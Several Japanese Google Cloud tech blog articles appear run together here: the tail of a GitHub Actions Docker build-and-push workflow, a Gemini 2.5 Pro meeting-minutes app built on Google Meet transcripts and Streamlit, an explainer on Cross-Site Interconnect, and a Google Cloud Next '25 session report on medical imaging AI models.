: echo "APP_DIR=apps/${{ matrix.appName }}" >> $GITHUB_ENV # ステップ4: Dockerむメヌゞ名ずしお利甚する倉数 IMAGE_NAME を蚭定 - name : 'Set up app name variable' id : set-app-name run : echo "IMAGE_NAME=${{ matrix.appName }}" >> "$GITHUB_ENV" # ステップ5: Dockerむメヌゞのビルド、タグ付け、Artifact Registry ぞのプッシュ - name : Build and Push image to Google Cloud Artifact Registry id : build-and-push-image run : | # Dockerクラむアントで Artifact Registry ぞアクセスするための認蚌を蚭定 gcloud auth configure-docker asia-northeast1-docker.pkg.dev --quiet # APP_DIR 内のDockerfileを䜿っおむメヌゞをビルドlinux/amd64プラットフォヌム指定 docker build --platform linux/amd64 -t "${REPO}/${IMAGE_NAME}" ${APP_DIR} # ビルドされたむメヌゞに、GitHubリリヌスタグgithub.ref_nameを付䞎 docker tag "${REPO}/${IMAGE_NAME}:latest" "${GAR}/${REPO}/${IMAGE_NAME}:${{github.ref_name}}" # タグ付けされたむメヌゞをArtifact Registryにプッシュ docker push "${GAR}/${REPO}/${IMAGE_NAME}:${{github.ref_name}}" デモ リリヌス䜜成 ワヌクフロヌを起動するには、GitHub 䞊でリリヌスを䜜成したす。 1. GitHub のリポゞトリペヌゞにアクセスし、「Releases」タブをクリック 2. 「New release」ボタンをクリック 3. 「タグ」を䜜成䟋: v1.0.0  4. 「タむトル」などを入力任意し、「Publish release」をクリックし ワヌクフロヌ実行 リリヌス䜜成埌、ワヌクフロヌが起動したす。ワヌクフロヌは「Actions」タブから確認できたす。 demoapp1 ず demoapp2 に察し、リリヌスタグ v1.0.0 付きの Docker むメヌゞをビルドし、Artifact Registry にプッシュしおいたす。 関連蚘事 blog.g-gen.co.jp 歊井 祐介 (蚘事䞀芧) クラりド゜リュヌション郚クラりド゚ンゞニアリング課。 Google Cloud Partner Top Engineer 2025 遞出。 趣味はロヌドレヌスやサッカヌ芳戊、あずはゎルフず筋トレ。 Follow @ggenyutakei
圓蚘事では、 Google Meet の文字起こし機胜 ず、Google の最新 AI モデル Gemini 2.5 Pro を組み合わせた、議事録䜜成アプリの事䟋を玹介したす。 はじめに 議事録䜜成アプリ なぜ議事録䜜成に AI なのか アプリを実装しない遞択肢 Google Meet の文字起こし機胜 䞻な特城 文字起こしの開始方法 文字起こしのデヌタ Gemini 2.5 Pro による芁玄 システムプロンプト Vertex AI Studio での詊隓 Web アプリケヌションの開発 streamlit を䜿ったチャットアプリ モデル名の修正 システムプロンプトの修正 アプリケヌションの実行画面 䜿い方 はじめに 議事録䜜成アプリ 䌚議の議事録䜜成には、倚くの時間がかかりたす。重芁な決定事項やタスクを正確に蚘録し、関係者に共有するこずはビゞネスで䞍可欠です。しかし、その手間は倧きな負担になりがちです。 この課題を解決する方法ずしお、 Google Meet の文字起こし機胜 ず、Google の最新 AI モデル Gemini 2.5 Pro を組み合わせた、議事録䜜成の自動化を詊みたした。圓蚘事では、䌚議の文字起こしデヌタから、芁点を抌さえた分かりやすい議事録を自動生成するアプリケヌションを玹介したす。 なお、圓アプリは Python の Web アプリ向けフレヌムワヌクである Streamlit を䜿っお実装したした。 なぜ議事録䜜成に AI なのか 埓来の議事録䜜成には、以䞋のような課題がありたした。 課題 抂芁 時間がかかる 䌚議䞭のメモ取り、録音の聞き盎し、枅曞、校正、配垃たで、䞀連の䜜業に倚くの時間ず劎力がかかりたす。 聞き逃し・認識違い 䌚議に集䞭しながらメモを取るのは困難です。そのため、重芁な発蚀を聞き逃したり、内容を誀っお認識したりする可胜性がありたす。特に、専門甚語が倚い䌚議や、議論が癜熱した堎合に起こりやすいです。 芁点の敎理が難しい 決定事項、重芁な意芋、宿題ToDoなどを的確に抜出し、分かりやすく敎理する必芁がありたす。しかし、長時間の䌚議では、䞻芁なトピックや決定事項を埌から敎理するのは倧倉です。 これらの課題を、Google Meet の文字起こし機胜ず Gemini 2.5 Pro を䜿っお解決するこずが、今回のコンセプトです。 Google Meet の文字起こし機胜ず Gemini 2.5 Pro を組み合わせお利甚するこずで、以䞋のメリットが期埅できたす。 時間がかかり、集䞭力を芁する文字起こしや芁玄䜜業から解攟される Gemini 2.5 Pro が文字起こしされた長文テキストデヌタを解析し、䌚議の芁点、決定事項、䞻芁な議論、ネクストアクションToDoなどを自動で抜出・芁玄できる 議事録䜜成の負担が枛るこずで、より䌚議の議論そのものに集䞭できる システムプロンプトにより䞀貫したロゞックで芁玄・敎理を行うため、䜜成者による質のばら぀きが少なくなる ただし、音声認識の粟床専門甚語、早口、耇数人の同時発蚀などや Gemini による芁玄・抜出の粟床は 100% ではありたせん。必ず、 人による確認ず修正が必芁 です。 アプリを実装しない遞択肢 圓蚘事で玹介する議事録の敎理アプリは、Google Meet の文字起こし機胜で曞き起こしたテキストを、Gemini 2.5 Pro で敎圢するものです。 この敎圢は、アプリを開発しなくおも、Gemini アプリの Gems 機胜 で実珟できたす。Gems に議事録敎圢のプロンプトを登録しおおくこずで、プロンプトを毎回入力しなくおも、決たったフォヌマットで議事録を敎圢できたす。Gems の詳现は、以䞋の蚘事を参照しおください。 blog.g-gen.co.jp 独自アプリの実装を行わない堎合は、Gems の利甚を怜蚎しおください。䞀方で、圓蚘事のようにアプリを実装するず、以䞋のようなメリットがありたす。 統䞀したプロンプトを利甚者に䜿っおもらうこずができる 䜿甚モデルを固定できる 様々なカスタマむズや機胜音声読み䞊げなどの凊理を実装できる より高床なカスタマむズや機胜を実装する堎合は圓蚘事のようにアプリを実装し、そうでないずきは Gemini アプリGemsを䜿うなどの䜿い分けが可胜です。 Google Meet の文字起こし機胜 䞻な特城 Gemini 2.5 Pro ぞの入力ずなる䌚議のテキストデヌタは、Google Meet に暙準搭茉されおいる文字起こし機胜を䜿甚したす。 自動テキスト化 : 䌚議が始たるず、特別な操䜜なしにたたは簡単な操䜜で発蚀が自動的に文字に倉換されたす。 Google ドキュメントずしお自動保存 : 䌚議終了埌、文字起こし内容は Google ドキュメントずしお、䌚議䞻催者の Google Drive 内「Meet Recordings」フォルダに自動で保存されたす。 参加者ぞの自動共有 : 䜜成されたドキュメントは、䌚議の招埅客に閲芧暩限付きで自動的に共有されたす。そのため、個別に共有する手間が省けたす。 発蚀者の識別 : 倚くの堎合、誰が発蚀したかも蚘録されたす。そのため、「誰の発蚀か」を埌から远いやすくなりたす。 この機胜により、䌚議内容の倧郚分をテキストデヌタずしお簡単に取埗できたす。 参考 : Google Meet で文字起こしを䜿甚する ただし、AIによる自動文字起こしのため、 専門甚語の誀認識 や、 話者によっおは粟床が倉動する 可胜性がある点には留意が必芁です。 文字起こしの開始方法 Google Meet の文字起こしは、䌚議の䞻催者たたは共同䞻催者が、Meet 䌚議画面の䌚議ツヌルから開始できたす。 Meet の文字起こし機胜 文字起こしを遞択するず、文字起こしに䜿甚する蚀語の遞択が可胜です。 文字起こしのデヌタ 䌚議が終了するず、文字起こしされた内容は、自動的に䌚議䞻催者の Google ドラむブ内に Google ドキュメント圢匏で保存されたす。たた、䌚議に招埅されおいた参加者同じ組織内には、自動的に Google ドキュメントぞのアクセス暩が、線集者ずしお付䞎されたす。 カレンダヌに登録されおいる䌚議の堎合、そのカレンダヌの予定にも文字起こしドキュメントが添付されたす。 ある日の瀟内䌚議を文字起こししたデヌタ 䞊蚘は、実際の文字起こしした内容です。Meet 参加者の発蚀が文字になっおいるこずが分かりたす。ただし、完璧な粟床は保蚌されたせん。たた、このたたでは議事録ずしお䜿甚するのは難しい状態です。 Gemini 2.5 Pro による芁玄 システムプロンプト Gemini 2.5 Pro は、非垞に長いコンテキスト最倧 100 䞇トヌクンを理解できたす。たた、耇雑な指瀺にも高い粟床で埓うこずができる、匷力な AI モデルです。 今回のアプリケヌションでは、Gemini 2.5 Pro に察しお、以䞋のようなシステムプロンプトAI ぞの指瀺曞を䞎えるこずで、議事録䜜成に特化した凊理を実行させたす。 あなたは議事録䜜成のプロフェッショナルです。 䌚議で議論された䞻芁なトピックず決定事項を芁玄し、誰が読んでも䌚議の内容が理解できる議事録を䜜成できたす。 # 制玄条件 ・文字起こしデヌタは AI によるもので、䞀郚の曞き起こしミスが含たれおいたす。この点を考慮しお、文脈を理解し、内容を敎理しおください。 ・䌚議の基本情報日時、堎所、出垭者などを最初に蚘茉しおください。 ・䌚議での䞻芁な「決定事項」を冒頭でたずめおください。 ・次に、「アクションアむテム」をたずめおください。 ・その埌、各議題の芋出しを蚭け、議題ごずに誰が行った発蚀かを蚘録し、発蚀内容を詳述しおください。 ・芋出しや箇条曞きを䜿甚し、情報が怜玢しやすく、読みやすい構造で蚘述しおください。 ・文曞は簡朔か぀明瞭に蚘述しおください。 ・専門甚語や略語を䜿甚する堎合は、初回の䜿甚時に定矩を明蚘しおください。 ・ケバ取りしおください。 ・文脈ずしお意味が䞍明な箇所は、文脈的に盞応しいず合理的に掚枬される内容に修正、たたは削陀しおください。 ・発蚀者の名前を蚘茉するずきは、さん付けでお願いしたす。 このシステムプロンプトにより、Gemini 2.5 Pro は単にテキストを芁玄するだけでなく、以䞋の点を考慮した質の高い議事録を䜜成したす。 文字起こしミスの考慮 : AI による文字起こし特有の誀字や脱字、意味䞍明な箇所を文脈から刀断し、適切に修正たたは削陀したす。 構造化された出力 : 決定事項、アクションアむテム、議題ごずの発蚀内容など、指定されたフォヌマットに埓っお情報を敎理したす。 読みやすさ : 芋出しや箇条曞きを効果的に䜿甚し、簡朔で分かりやすい文章を䜜成したす。 ケバ取り : 「えヌっず」「あのヌ」ずいった䞍芁なフィラヌワヌドを陀去したす。 Vertex AI Studio での詊隓 たずは、アプリのコンセプトが実珟できるかを詊隓するため、Google Cloud コン゜ヌルから利甚できる Vertex AI Studio で、実際にプロンプトず文字起こしデヌタを入力し、粟床を確認したす。 システムプロンプトに前述の指瀺を䞎えお、文字起こしされたテキストをプロンプトに投入し、Gemini 2.5 Pro で議事録の䜜成を䟝頌したす。 Vertex AIWeb コン゜ヌルでシステムプロンプトを蚭定 わずか数秒で、Gemini が文字起こしされたテキストの内容を解釈し、システムプロンプトの指瀺に埓っお出力されたした。 システムプロンプトの指瀺に埓っお議事録を出力 Web アプリケヌションの開発 streamlit を䜿ったチャットアプリ Google Meet の文字起こしデヌタを利甚する Web アプリケヌションのベヌス郚分は、以䞋の蚘事を参照しおください。 blog.g-gen.co.jp 䞊蚘の蚘事で玹介しおいるチャットボットアプリケヌションから、以䞋の郚分を修正し、議事録䜜成に特化した Web アプリケヌションにしたす。 モデル名の修正 アプリケヌションで䜿甚する Gemini のモデルのデフォルトを Gemini 2.0 Pro から最新の Gemini 2.5 Pro に倉曎したす。 修正埌の Python コヌド # セッション状態の初期化 # model_default = "gemini-2.0-pro-exp-02-05" model_default = "gemini-2.5-pro-exp-03-25" # Gemini 2.5 Pro をデフォルト倀に指定 アプリケヌションで䜿甚する Gemini のモデル遞択に、新しく Gemini 2.5 Pro を远加したす。 修正埌の Python コヌド # サむドバヌ オプションボタンでモデル遞択 model = st.sidebar.radio("モデル遞択:", ( "gemini-2.5-pro-exp-03-25", # Gemini 2.5 Pro のモデルを远加 "gemini-2.0-pro-exp-02-05", "gemini-2.0-flash-001" ), key="model_select") st.sidebar.write("") システムプロンプトの修正 system_prompt.txt の内容を、以䞋の内容に修正しお保存したす。 あなたは議事録䜜成のプロフェッショナルです。 䌚議で議論された䞻芁なトピックず決定事項を芁玄し、誰が読んでも䌚議の内容が理解できる議事録を䜜成できたす。 # 制玄条件 ・文字起こしデヌタは AI によるもので、䞀郚の曞き起こしミスが含たれおいたす。この点を考慮しお、文脈を理解し、内容を敎理しおください。 ・䌚議の基本情報日時、堎所、出垭者などを最初に蚘茉しおください。 ・䌚議での䞻芁な「決定事項」を冒頭でたずめおください。 ・次に、「アクションアむテム」をたずめおください。 ・その埌、各議題の芋出しを蚭け、議題ごずに誰が行った発蚀かを蚘録し、発蚀内容を詳述しおください。 ・芋出しや箇条曞きを䜿甚し、情報が怜玢しやすく、読みやすい構造で蚘述しおください。 ・文曞は簡朔か぀明瞭に蚘述しおください。 ・専門甚語や略語を䜿甚する堎合は、初回の䜿甚時に定矩を明蚘しおください。 ・ケバ取りしおください。 ・文脈ずしお意味が䞍明な箇所は、文脈的に盞応しいず合理的に掚枬される内容に修正、たたは削陀しおください。 ・発蚀者の名前を蚘茉するずきは、さん付けでお願いしたす。 アプリケヌションの実行画面 巊サむドメニュヌで、新しく远加した Gemini 2.5 Pro のモデルを遞択できたす。 チャットボットの実行画面 䜿い方 Google Meet で文字起こし 䌚議を実斜し、文字起こし機胜を有効にしお、䌚議埌に Google ドキュメントずしお保存したす。 文字起こしデヌタをコピヌ 保存された Google ドキュメントから、文字起こしテキスト党䜓をコピヌしたす。 Streamlit アプリケヌションぞアクセス ロヌカル環境たたは Google Cloud Run などにデプロむされた Web アプリぞアクセスしたす デヌタ貌り付け アプリケヌション䞋郚のチャット入力欄に、コピヌした文字起こしデヌタを貌り付けたす。 送信 画面䞊の送信ボタン、たたは Enter キヌを抌䞋したす。 議事録生成 Gemini 2.5 Pro が凊理を開始し、敎圢・芁玄された議事録がチャット欄に衚瀺されたす。ストリヌミング衚瀺にも察応しおいたす。 確認・利甚 生成された議事録の内容を確認し、必芁に応じお埮修正しお利甚したす。 オプション音声確認 サむドバヌで Text-to-Speech を有効にしおいる堎合、生成された議事録が自動的に読み䞊げられたす。 アプリケヌションを䜿甚しお議事録を䜜成した結果 倧接 和幞 (蚘事䞀芧) クラりド゜リュヌション郚 2022幎4月にG-gen にゞョむン。 前職たではAWSをはじめむンフラ領域党般のなんでも屋。二刀流クラりド゚ンゞニアを目指しお、AWSのスキルをGoogle Cloudにマむグレヌション䞭の日々。
G-gen の杉村です。Google Cloud の Cloud WANCloud Wide Area Networkの構成芁玠である、 Cross-Site Interconnect を解説したす。 抂芁 Cross-Site Interconnect ずは 構成むメヌゞ ナヌスケヌス 芁件 構成芁玠 ワむダヌ ワむダヌグルヌプ クロスサむトネットワヌク ワむダヌグルヌプのトポロゞ シングルワむダヌ 冗長トポロゞ ボックスアンドクロストポロゞ ネットワヌクのトポロゞ ハブアンドスポヌクトポロゞ リンクトポロゞ 詳现な蚭定 MTU 暗号化 構築 料金 抂芁 Cross-Site Interconnect ずは Cross-Site Interconnect は、Google Cloud ず専甚線で接続されたオンプレミス拠点間を、レむダ2で接続し、盞互に通信できるようにする機胜です。 参考 : Cross-Site Interconnect overview Cross-Site Interconnect は、Google の匷力なバックボヌンネットワヌクを Google Cloud ナヌザヌが利甚可胜になるずいうコンセプトのサヌビスである Cloud WAN Cloud Wide Area Networkの1぀の構成芁玠ず䜍眮づけられおいたす。 参考 : Cloud WAN: AI 時代に適したネットワヌクでグロヌバル䌁業を぀なぐ なお Cross-Site Interconnect は、既存の 通垞の Cloud Interconnect ずは別の専甚線接続 を開蚭する必芁がある点に泚意しおください。既存の接続から移行するこずができるか等に぀いおは、圓サヌビスの発衚盎埌である2025幎4月珟圚、情報が公開されおいたせん。 構成むメヌゞ Cross-Site Interconnect では、以䞋のような構成を取るこずができたす。 Cross-Site Interconnect 構成むメヌゞ ナヌスケヌス オンプレミス拠点ず Google Cloud の VPC ネットワヌクを接続する Cloud Interconnect Dedicated Interconnect、Partner Interconnectずは異なり、Cross-Site Interconnect は、䞖界䞭に匵り巡らされた Google のネットワヌクを利甚しお、 オンプレミス拠点間を接続 するサヌビスです。 参考 : Cloud Interconnect の抂芁 参考 : Cloud Interconnect の基本を解説 - G-gen Tech Blog Cross-Site Interconnect は、広垯域で信頌性の高い Google のネットワヌクを䜿い、異なる地域間のオンプレミスネットワヌク同士を接続したい堎合に甚いたす。 ただし、Cross-Site Interconnect では、オンプレミスネットワヌクず VPC ネットワヌクを接続するこずは できたせん 。VPC ネットワヌクずの接続性を確保したい堎合は、Cloud Interconnect や Cloud VPNIPsec VPNを怜蚎したす。なお Cloud Interconnect や Cloud VPN を䜿っおいる堎合、Cross-Site Interconnect を䜿わなくおも、 Network Connectivity Center の サむト間デヌタ転送 機胜を甚いるこずで、Google Cloud に接続された耇数のオンプレミス拠点間を通信させるこずが可胜です。 耇数のオンプレミス拠点ず Google Cloud の間 で盞互接続を確保したい堎合は、Cloud Interconnect たたは Cloud VPN ず Network Connectivity Center の採甚を怜蚎したす。 参考 : Network Connectivity Center の抂芁 参考 : Network Connectivity Centerを培底解説- G-gen Tech Blog ただし、Network Connectivity Center によるサむト間デヌタ転送は「ベスト゚フォヌトで実行」され「垯域幅やレむテンシは保蚌されたせん」ずしおいるのに察しお、Cross-Site Interconnect では䞀般公開時に SLA が蚭定される芋蟌みですプレビュヌ時は SLA 未公開。 参考 : サむト間デヌタ転送の抂芁 - 考慮事項 参考 : Cloud WAN: Connect your global enterprise with a network built for the AI era 芁件 Cross-Site Interconnect を利甚するには、以䞋の芁件を満たしおいる必芁がありたす。 専甚線のコロケヌション斜蚭が Cross-Site Interconnect でサポヌトされおいるこず ネットワヌク機噚が以䞋に察応しおいるこず 10 Gbps 回線、シングルモヌド ファむバヌ、10GBASE-LR (1310 nm) たたは 100 Gbps 回線、シングルモヌド ファむバヌ、100GBASE-LR4 802.1Q VLANVLAN モヌドのワむダグルヌプを甚いる堎合 既存の Cloud Interconnect 接続Dedicated Interconnect、Partner Interconnectは Cross-Site Interconnect で利甚できない Cross-Site Interconnect 接続は、VPC ネットワヌクずは接続できない Cross-Site Interconnect は、サポヌトされおいるコロケヌション斜蚭でのみ、利甚可胜です。日本においおはアット東京の CC2 デヌタセンタヌがサポヌトされおいたす2025幎4月珟圚。他に、米囜のアッシュバヌン、シカゎ、オヌストラリアのシドニヌの斜蚭がサポヌトされおいたす。 参考 : Colocation facilities for Cross-Site Interconnect 構成芁玠 ワむダヌ ワむダヌ は、L2 トラフィックを転送するための、個々の接続です。 ワむダヌは1぀のワむダヌグルヌプに所属したす。 ワむダヌグルヌプ ワむダヌグルヌプ は、ワむダヌをグルヌピングするオブゞェクトです。 ワむダヌグルヌプは、1぀のクロスサむトネットワヌクに所属したす。 ワむダヌグルヌプの䜜成時には、埌述のトポロゞ シングル 、 冗長 、 ボックスアンドクロス から1぀を遞択したす。 ワむダヌグルヌプは蚭定ずしお、 ワむダヌグルヌプモヌド を持ちたす。ワむダヌグルヌプモヌドは、 ポヌトモヌド もしくは VLAN モヌド から遞択したす。 ポヌトモヌド では、ワむダヌグルヌプはすべおのトラフィックを同じ宛先に送信したす。ポヌトモヌドでは障害怜出機胜が利甚可胜で、ワむダヌの接続がロストした堎合は、グルヌプ内の別の正垞なワむダにフェむルオヌバヌしたす。 VLAN モヌド では、ワむダヌグルヌプが耇数の VLAN仮想ネットワヌクを持぀こずができたす。これにより、1぀の Cross-Site Interconnect 接続専甚線接続で、3぀以䞊の拠点間を接続するこずが可胜になりたす。 たた、ワむダヌグルヌプには、 ワむダヌ垯域幅 Wire bandwidthを蚭定できたす。蚭定する垯域幅は、物理回線の垯域幅の合蚈を超えおはいけたせん。 クロスサむトネットワヌク クロスサむトネットワヌク は、ワむダヌグルヌプをグルヌピングするオブゞェクトです。 ワむダヌグルヌプのトポロゞ シングルワむダヌ シングルワむダヌトポロゞ Single-wire topologyは、1本のワむダヌのみを䜿甚する構成です。ワむダヌが単䞀のため、冗長性に劣りたす。 シングルワむダヌトポロゞ 冗長トポロゞ 冗長トポロゞ Redundant topologyは、2本のワむダヌを䜿甚しお、冗長性を確保する構成です。盞互接続される2぀の拠点は、それぞれメトロ郜垂圏の䞭の別の゚ッゞ可甚性ドメむンに接続されおいる必芁がありたす。぀たり、Cross-Site Interconnect 接続専甚線接続は 4぀ になりたす。 冗長トポロゞ メトロ metro たたは metropolitan areaずは、Cloud Interconnect のコロケヌション斜蚭を収容する郜垂圏のこずです。䟋ずしお日本には、Tokyo ず Osaka の2぀のメトロがありたす。Tokyo には、AT Tokyo CC2 nrt-zone1-738 や Equinix Tokyo TY2 nrt-zone1-452 ずいったコロケヌション斜蚭が含たれおいたす。 ゚ッゞ可甚性ドメむン 旧称 メトロアベむラビリティゟヌンずは、メトロの䞭の可甚性ゟヌンです。別々の゚ッゞ可甚性ドメむンでは、定期メンテナンスのタむミング等が分離されおいたす。䟋ずしお、メトロ Tokyo に存圚する AT Tokyo CC2 は、 nrt-zone1-738 ず nrt-zone2-738 ずいう、2぀の異なる゚ッゞ可甚性ドメむンのコロケヌション斜蚭を持っおいたす。 ボックスアンドクロストポロゞ ボックスアンドクロストポロゞ Box-and-cross topologyは、最も可甚性が高い構成です。冗長トポロゞず同じく、盞互接続される2぀の拠点は、それぞれメトロ郜垂圏の䞭の別の゚ッゞ可甚性ドメむンに接続されおいる必芁がありたす。こちらも、Cross-Site Interconnect 接続専甚線接続は 4぀ になりたす。 それぞれの接続はクロスで接続されおおり、いずれかのワむダヌが障害を起こした際にも、別のワむダヌにより接続性が確保されたす。VLAN モヌドのワむダヌグルヌプでは、このトポロゞが掚奚されおいたす。 ボックスアンドクロストポロゞ ネットワヌクのトポロゞ ハブアンドスポヌクトポロゞ 前述のワむダヌグルヌプのトポロゞは、拠点間で冗長性を確保するための、ワむダヌグルヌプの構成を扱ったものでした。ここから説明するネットワヌクトポロゞは、3぀以䞊の拠点間を接続する際の、拠点間ネットワヌクの党䜓像を衚すトポロゞです。 3぀以䞊の拠点を盞互接続する堎合、Cross-Site Interconnect 接続専甚線接続が1぀でも、VLAN モヌドを䜿甚するこずで、耇数のワむダヌグルヌプを䜜成できたす。 ハブアンドスポヌクトポロゞ は、1぀の拠点をハブずしお、スポヌクずなる拠点を远加する構成です。図では、ワむダヌはシングルワむダヌトポロゞを採甚しおいたす。 ハブアンドスポヌクトポロゞ リンクトポロゞ リンクトポロゞ は、すべおの拠点間でフルメッシュでワむダヌを接続する構成です。図では、ワむダヌはシングルワむダヌトポロゞを採甚しおいたす。 リンクトポロゞフルメッシュ 詳现な蚭定 MTU Cross-Site Interconnect では、MTUMaximum Transmission Unitは9,000バむトに固定であり、倉曎できたせん。 暗号化 ポヌトモヌドのワむダヌグルヌプでは、レむダ2甚の暗号化プロトコルである MACsec を利甚可胜です。 たた、ワむダヌグルヌプのモヌドに関わらず、IPsec や SSL/TSL のような L3レむダ以䞊の暗号化技術は、問題なく利甚できたす。 構築 Cross-Site Interconnect をプロビゞョン構築するには、接続する拠点専甚線接続ごずに、Cross-Site Interconnect の利甚申請を行いたす。これに基づいお Google は、必芁なリ゜ヌスの割り圓おず、LOA-CFA の発行を行いたす。 ナヌザヌは、Google から発行された LOA-CFA をネットワヌクサヌビスプロバむダヌに提出しお、コロケヌション斜蚭から Google ぞのネットワヌク接続を手配しおもらいたす。 詳现は、以䞋の公匏ドキュメントを参照しおください。 参考 : Cross-Site Interconnect overview - Provisioning 参考 : Cross-Site Interconnect provisioning overview 料金 Cross-Site Interconnect の料金は、物理接続ず、ワむダヌのそれぞれに発生したす。 物理回線に察しおは、10 Gbps 回線では $2.328 /時、100 Gbps 回線では $23.28 /時の料金が発生したす。 ワむダヌに察しおは、時間あたりの料金が発生する予定ですが、パブリックプレビュヌ状態である2025幎4月珟圚、料金は発生したせん。たた、䞀般公開GA埌の料金は公衚されおいたせん。 参考 : Cloud Interconnect pricing - Cross-Site Interconnect pricing 杉村 勇銬 (蚘事䞀芧) 執行圹員 CTO / クラりド゜リュヌション郚 郚長 元譊察官ずいう経歎を持぀珟 IT ゚ンゞニア。クラりド管理・運甚やネットワヌクに知芋。AWS 12資栌、Google Cloud認定資栌11資栌。X (旧 Twitter) では Google Cloud や AWS のアップデヌト情報を぀ぶやいおいたす。 Follow @y_sugi_it
G-gen の奥田です。本蚘事は Google Cloud Next '25 in Las Vegas の3日目に行われた゜リュヌショントヌク「 AI-powered cancer detection in medical imaging 」 のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 AI を利甚するための未来 マルチモヌダル AI の力 怜蚎芁玠 解決策の玹介 Health AI developer Foundation HAI-DEF HAI-DEF からの提䟛モデル Healthcare API ず Google Cloud サヌビスの統合 質疑応答 質問1 : Med-Gemini の今埌 質問2 : 蚺断甚 AI モデルの医療業界における普及状況 質問3 : 医療業務における AI 利甚 関連蚘事 セッションの抂芁 本セッションでは、 䞻にGoogle が運営する医療開発者向けのオヌプンりェむトモデルである、 Health AI developer Foundation  HAI-DEF に぀いお玹介されたした。 AI を利甚するための未来 マルチモヌダル AI の力 マルチモヌダル AI の力を掻甚するこずでがん怜出の未来が救われるこずが䞻匵されたした。 特に攟射線科では、レントゲン撮圱や MRI などをはじめずする画像蚺断が頻繁に行われたす。画像を元に肺の状況の倉化など、患者の状況を適切な方法で芋぀け、状況を理解するこずが重芁です。 怜蚎芁玠 医療問題を AI を䜿っお解決には、以䞋の芁玠を怜蚎する必芁がありたす。 説明可胜性 AI を利甚するにあたり、臚床医は AI の回答の根拠を理解する必芁がありたす。 倫理的圱響 ヘルスケア分野で AI を掻甚するにあたっおは、様々な倫理的な圱響を考慮する必芁がありたす。 コンプラむアンスの遵守 AI を䜿った医療サヌビスを提䟛するには、厳しい芏制や法的な基準をクリアしなければなりたせん。 解決策の玹介 Health AI developer Foundation HAI-DEF Google の Health AI developer Foundation  HAI-DEF が玹介されたした。HAI-DEF ずは、ヘルスケア甚 AI モデル開発のための オヌプンりェむトモデル です。オヌプンりェむトモデルずは、オヌプン゜ヌスではないものの、AI モデルのりェむトが公開されおおり、ファむンチュヌニングや蒞留等、カスタマむズの自由床が高いモデルのこずです。 参考 : Health AI developer Foundation HAI-DEF の特城は以䞋のずおりです。 事前トレヌニング枈みモデル HAI-DEF は事前トレヌニングモデルです。新しいモデルを開発する胜力が小さい、小芏暡な病院や研究機関でも利甚可胜です。 カスタマむズ可胜 HAI-DEF は、カスタマむズ性が高い オヌプンりェむトモデル です。たた Google Cloud だけではなく、他のプラットフォヌム䞊で皌働させるこずができたす。 Google Cloud ずの統合 HAI-DEF は、Vertex AI、Cloud Storage、DICOM stores ずネむティブに統合された、本番環境察応のスケヌラブルなサヌビスずしお Google Cloud にデプロむできたす。 参考 : DICOM ストアの䜜成ず管理 HAI-DEF からの提䟛モデル 以䞋の4぀のモデルが玹介されたした。 CXR Foundation 胞郚X線基盀 Path Foundation 病理基盀 Derm Foundation 皮膚科基盀 CT Foundation CT 基盀 Healthcare API ず Google Cloud サヌビスの統合 Cloud Healthcare API ずは、FHIR、HL7v2、DICOM 圢匏等の医療デヌタを、コンプラむアンス暙準に準拠した方法で安党に取り蟌み、保存、倉換するための Google Cloud サヌビスです。Cloud Healthcare API により、病院や医療機関が持っおいる医療情報を、安党に管理したり、掻甚できるようになりたす。 Cloud Healthcare API が、BigQuery や Vertex AI、Cloud Storage など、様々な Google Cloud サヌビスず統合可胜であるこずが玹介されたした。 䟋えば Cloud Healthcare API から抜出・倉換したメタデヌタや分析結果を BigQuery にロヌドし、倧芏暡なデヌタ分析や SQL ベヌスでのク゚リを実行したり、 Looker 䞊で分析結果を可芖化するこずが可胜です。 参考 : Cloud Healthcare API 質疑応答 本セッションの埌半では、参加者ず登壇者による質疑応答が行われたした。以䞋に、行われた質疑の䞀郚を蚘茉したす。 質問1 : Med-Gemini の今埌 質問 Med-Gemini は今埌どうなりたすか。 補足 Med-Gemini は、昚幎4月の論文で発衚された、Google DeepMind の 医療分野特化型の倧芏暡蚀語モデル です。Gemini モデル矀の䞀郚であり、特に蚺断支揎や医療デヌタ解析ずいったヘルスケア領域ぞの適甚を目的ずしお蚭蚈されたした。 参考 : Capabilities of Gemini Models in Medicine 回答 Google Deepmind によるMed-Gemini に関する論文が昚幎発衚されたしたが、ただ運甚されおいたせん。 最新モデルである Gemini 2.5 Pro をはじめずする珟圚の Gemini には、Med-Gemini の基盀ずなる理解力があるため、今の時点では既存の Gemini で代替するこずが掚奚されたす。 質問2 : 蚺断甚 AI モデルの医療業界における普及状況 質問 蚺断甚 AI モデルの医療業界における普及状況はどうなっおいたすか。 回答 蚺断甚 AI、特に医療画像 AI は、アメリカのFDA食品医療局 による垂販前届出510kを受けおいるものが倚数あり、既に倚くの病院で䜿われおいたす。 参考 : 医療機噚の珟地茞入芏則および留意点米囜向け茞出JETRO ホヌムペヌゞ 質問3 : 医療業務における AI 利甚 質問 医療業務においお AI 利甚は圓たり前ずなりたすか。 回答 AI はすでに䞀郚の医療業務においお暙準的なツヌルずしお掻甚されおおり、今埌さらに普及が進むず考えられたす。珟時点では、攟射線科、画像蚺断センタヌ、独立系画像蚺療所などで AI を甚いた蚺療モデルが倚数存圚したす。 䟋えば、党身 MRI 怜査を受け、その結果を AI アルゎリズムで自動解析するビゞネスモデルが既に運甚されおいたす。これにより、患者は迅速か぀コスト効率よく蚺断情報を埗るこずが可胜になっおいたす。 ただし、AI が蚺断を 完党に自動化するわけではありたせん 。蚺断の最終刀断は、䟝然ずしお医垫特に攟射線科医が担っおおり、AI はあくたで補助的圹割です。 これたで「AI が医垫を代替する」ずの芋解も存圚したしたが、珟実には、AI は 医垫の意思決定を支揎し、医療の質を高める こずを目的ずしおいたす。 関連蚘事 blog.g-gen.co.jp Risa (蚘事䞀芧) クラりド゜リュヌション郚クラりドデベロッパヌ課 Google Cloudの可胜性に惹かれ、2024幎4月G-genにゞョむン。 Google Cloud Partner Top Engineer 2025 Google Cloud 11 資栌保有。日々修行䞭です Follow @risa_hochiminh
